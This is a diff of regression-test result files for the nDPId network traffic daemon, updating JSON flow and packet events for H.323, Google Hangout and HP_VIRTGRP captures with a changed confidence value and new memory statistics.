-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1198747080010,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":125,"pkt_l4_len":91,"thread_ts_msec":1198747080010,"pkt":"ABMh8GpfABj+bZZlCABFAABviRAAAIARjk0RAgChEQIAfAa3B\/IAWwaKBIAAAAYACJFKAAQ+AE8AcABlAG4ASAAzADIAMwAgAEcAYQB0AGUAawBlAGUAcABlAHIAIABvAG4AIABtAGYAbwB0AHQAZQBrAGkAbgARAgChBrc="} 
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1198747080226,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1198747080226,"pkt":"ABj+bZZlABMh8GpfCABFAACgx94AAIART04RAgB8EQIAoQfyBrcAjI1fDsAAAQYACJFKAASAAQARAgB8BrgBABECAHwH8iIArgEAPQABhA4QA0AzMzMzMzMzMzCZkD4ATwBwAGUAbgBIADMAMgAzACAARwBhAHQAZQBrAGUAZQBwAGUAcgAgAG8AbgAgAG0AZgBvAHQAdABlAGsAaQBuAK4BAD0oCwAAAQABgAGA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="} -00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":1297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1198747160184} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -20,9 +20,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872899 bytes -~~ total memory freed........: 5872899 bytes -~~ total allocations/frees...: 118131/118131 +~~ total memory allocated....: 6006533 bytes +~~ total memory freed........: 6006533 bytes +~~ total allocations/frees...: 120893/120893 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 676 chars diff --git a/test/results/hangout.pcap.out b/test/results/hangout.pcap.out index 757609a32..d5c23c6df 100644 
--- a/test/results/hangout.pcap.out +++ b/test/results/hangout.pcap.out 
@@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1468516947751} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1468516947751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1468516947751,"pkt":"CJ4BbNkmACFeRhcmCABFAACEs2cAACwRwp9KfYZ\/Clk9DUtp3FYAcAThAQEAVCESpEJmaHpqc2RpS0drd1gABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFKAHosL2sVKq2EKifFUwLylv3i3sgCgABLYwivQ="} 
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1468516948761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1468516948761,"pkt":"CJ4BbNkmACFeRhcmCABFAACEtXUAACwRwJFKfYZ\/Clk9DUtp3FYAcMuPAQEAVCESpEJ2bG8rRTlqWDZMSTAABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFD0l9HkkR5C8mDGwDSrC9i\/8E7pdgCgABPT5D+E="} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1468516949760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1468516949760,"pkt":"CJ4BbNkmACFeRhcmCABFAACEuNIAACwRvTRKfYZ\/Clk9DUtp3FYAcJ51AQEAVCESpEJFNlpieTl0eEswU3gABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFGvaO+U3jhYTDCbM5zzzk6bw5Z+5gCgABA724k8="} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1468516947751,"flow_last_seen":1468516965768,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516965768,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1468516947751,"flow_last_seen":1468516965768,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516965768,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":1976,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1468516965768} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878202 bytes -~~ total memory freed........: 5878202 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6011836 bytes +~~ total memory freed........: 6011836 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 836 chars diff --git a/test/results/hpvirtgrp.pcap.out b/test/results/hpvirtgrp.pcap.out index 812e3ab17..15390448a 100644 --- a/test/results/hpvirtgrp.pcap.out +++ b/test/results/hpvirtgrp.pcap.out 
@@ -4,63 +4,63 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":522,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1614861892925} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="} 
